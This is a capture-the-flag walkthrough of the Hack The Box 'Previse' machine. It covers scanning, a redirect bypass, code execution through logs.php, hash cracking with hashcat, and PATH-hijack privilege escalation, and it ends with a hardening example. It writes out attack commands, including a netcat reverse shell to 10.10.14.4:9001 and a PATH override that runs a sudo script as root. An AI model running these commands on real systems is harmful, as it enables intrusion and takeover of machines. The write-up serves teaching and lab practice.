Hack The Box Previse HTB CTF Machine Walkthrough



In this blog, we cover the Previse machine from Hack The Box, a capture-the-flag challenge rated easy. This challenge offers a lot to learn, for example the PATH variable, code execution, and hash cracking.


Table of Contents

Scanning

  • Port Scanning (Nmap Tool)

Enumeration

  • Directory Scanning through Gobuster

Exploitation

  • Code Execution through PHP
  • Crack MD5 Hash using Hashcat
  • Read (user.txt)

Privilege Escalation

  • Sudo Rights with PATH Variable
  • Read (root.txt)



Scanning

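As always, we start by scanning the target. Nmap may be the best tool for network scanning. In the command below, -sC runs the default scripts, -sV detects service versions, and -oA writes the results in all output formats under nmap/previse. For more information on the Nmap command, follow the link below.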

nmap -sC -sV -oA nmap/previse 10.10.11.104

I found two open ports: 22 for SSH and 80 for HTTP.

Nmap Scanning

The index page of the Previse website looks like this.

Previse Login Page

Enumeration

Most challenges call for directory scanning at this stage. Kali Linux ships several directory scanning tools for penetration testers. Gobuster is a popular one, and we will use it here with the command below.

gobuster dir --url http://10.10.11.104/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o directory.log

Previse Gobuster Result

The Gobuster scan found a /nav.php file that does not redirect to another page. Let us open this file.

Open nav.php File


But as soon as we tried to open the /account.php page, we were redirected to login.php. We intercepted the request to /account.php using Burp Suite, as shown in the image below.

Intercept Browser Request

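Let’s change the status code in the server response from 302 to “200 OK”. The server sends the page content in the body of the redirect response, so once the status code no longer tells the browser to redirect, the browser renders the page.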

Server Response Code


Excellent, we have found the page to create an account.

Account Page

Let’s create an account.

Create Account Pentestblog Name


Account creation was successful.

Username Success!

Let’s log in with the new credentials.

Login Pentestblog UserName

We got a SITEBACKUP.zip file. Let’s download it.

Download SiteBackup.zip File

After unzipping, we found two quite interesting files:

config.php, logs.php

Unzip Zip File

Surprise: config.php contains the username and password of the database. Note them down.

  • user = “root”
  • password = “mySQL_p@ssw0rd!:)”

Open Config.php


Going back to reviewing the source code for possible flaws, we found a call to the exec() function in logs.php that could be abused for code execution.

Open Logs.php File

Exploitation

Let’s use Burp to intercept the request from the /logs.php page and test the code execution. Successful!

Confirm Code Execution

Finally, we are ready for the reverse shell. Successful!

Reverse Shell

Finally, we are inside! Let’s log in to MySQL using the above credentials. If you are not sure how to list all users in a MySQL database server, I think you should read the following blog.


Check Mysql Running

We have got a username and password, but the password is stored as a hash, not in plain text.

MYSQL Password Found

We used hashcat with the rockyou.txt wordlist to crack the hash. Mode 500 (-m 500) is hashcat's md5crypt mode, and -a 0 selects a straight wordlist attack.

hashcat -a 0 -m 500 user /usr/share/wordlists/rockyou.txt

Decrypt Mysql Password

We used SSH to connect as the m4lwhere user. Login successful. We got our first flag.

“user.txt”

Read First Flag

Privilege Escalation

Now we need to escalate our privilege. Let’s type the command: sudo -l.

Sudo Right

Let’s analyze the /opt/scripts/access_backup.sh script. You can see that some commands/binaries are called by bare name rather than by absolute path, so the shell resolves them through the PATH variable and the script may be vulnerable to “path injection”.

Watch Carefully


In the /tmp directory, I created a “date” file containing a netcat command that returns a reverse shell on port 9001, and set the PATH environment variable so that /tmp is searched first.

echo "nc 10.10.14.4 9001 -e /bin/bash" > date
export PATH=/tmp:$PATH

Let’s execute the following command.

sudo /opt/scripts/access_backup.sh

We have received the reverse shell connection as root successfully!

Get Reverse Shell

We have got our second flag, the root flag!

Root Flag
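
The PATH lookup behind the privilege escalation step above, shown as an added example that is not code from the original post or from the machine: a bare-name call next to its hardened form. The function names, the SHADOWED marker and the look-alike file are constructed stand-ins, and the look-alike only prints a marker.

```sh
#!/bin/sh
# Added illustration with constructed stand-ins; this is not the content of
# /opt/scripts/access_backup.sh.

# Vulnerable pattern: "date" is looked up by bare name, so the first matching
# file in the caller's PATH decides what runs.
stamp_vulnerable() {
    date +%Y
}

# Hardened pattern: pin PATH to system directories and call the binary by
# absolute path, so the caller's PATH no longer matters. At the sudo layer,
# "Defaults env_reset" with "Defaults secure_path=..." in sudoers does the same.
stamp_hardened() {
    (
        PATH=/usr/sbin:/usr/bin:/sbin:/bin
        export PATH
        if [ -x /bin/date ]; then /bin/date +%Y; else /usr/bin/date +%Y; fi
    )
}

# Put a harmless look-alike "date" first in PATH inside a throwaway directory
# and print what the chosen variant actually executed.
demo() {
    variant=$1
    sandbox=$(mktemp -d) || return 1
    printf '#!/bin/sh\necho SHADOWED\n' > "$sandbox/date"
    chmod +x "$sandbox/date"
    out=$(PATH="$sandbox:$PATH"; export PATH; "$variant")
    rm -rf "$sandbox"
    printf '%s\n' "$out"
}

demo stamp_vulnerable   # the look-alike runs
demo stamp_hardened     # the real date runs
```

Any script that is allowed through sudo should follow the hardened pattern for every external command it calls, not only date.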


